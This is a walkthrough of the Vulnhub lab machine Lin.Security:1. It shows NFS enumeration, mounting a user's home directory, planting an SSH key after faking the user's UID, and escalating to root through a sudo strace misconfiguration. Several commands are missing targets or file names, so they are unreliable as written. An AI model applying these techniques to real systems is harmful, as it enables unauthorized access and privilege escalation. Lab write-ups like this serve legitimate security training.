Lin.Security: 1 Vulnhub Machine Walkthrough

Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.

Lets start by finding the IP.

root@kali:~# nmap -sS

Got the IP and open ports.

NFS is running on port 2019. Lets enumerate it.

root@kali:~# nmap -sV --script=nfs-*

We can mount /home/peter to our machine.

root@kali:/mnt# mkdir lin
root@kali:/mnt# mount /mnt/lin
root@kali:/mnt# ls -la

In order to login to the machine, we can place our ssh public key in .ssh directory

(refer this article to learn how to create an ssh key)

Copy our public key ( to /tmp directory.

root@kali:/mnt# cd /root/.ssh
root@kali:~/.ssh# ls -la
total 20
drw-------  2 root root 4096 Jul  2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw-------  1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r--  1 root root  563 Aug 12 08:35
-rw-r--r--  1 root root 3322 Aug 13 06:47 known_hosts
root@kali:~/.ssh# cp /tmp

make a directory named .ssh in the directory we just mounted.

root@kali:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

We dont have the permission to create the directory.

Lets create a user with uid 1001 to do this.

root@kali:~# useradd -u 1001 peter

Now change the ownwership of /tmp/ to peter

root@kali:~/.ssh# cd /tmp
root@kali:/tmp# chown peter:peter

Lets copy the file to the mounted directory now. First lets change the user to peter and copy the file.

root@kali:/mnt/lin# su peter
$ whoami
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/ authorized_keys

We have copied our public key file to /tmp/.ssh/authorized_keys

Now, Let’s try to login as peter through ssh.

root@kali:~# cd .ssh
root@kali:~/.ssh# ssh [email protected]

We are now logged in as peter. Lets see what all we can do here as a privileged user.

peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

We can run /usr/bin/strace as root.

Can we escalate our privileges with this?

GTFOBins says yes!

Lets try.

peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami

We got the root!

This was a comparitively easier machine. Lets root another machine next day!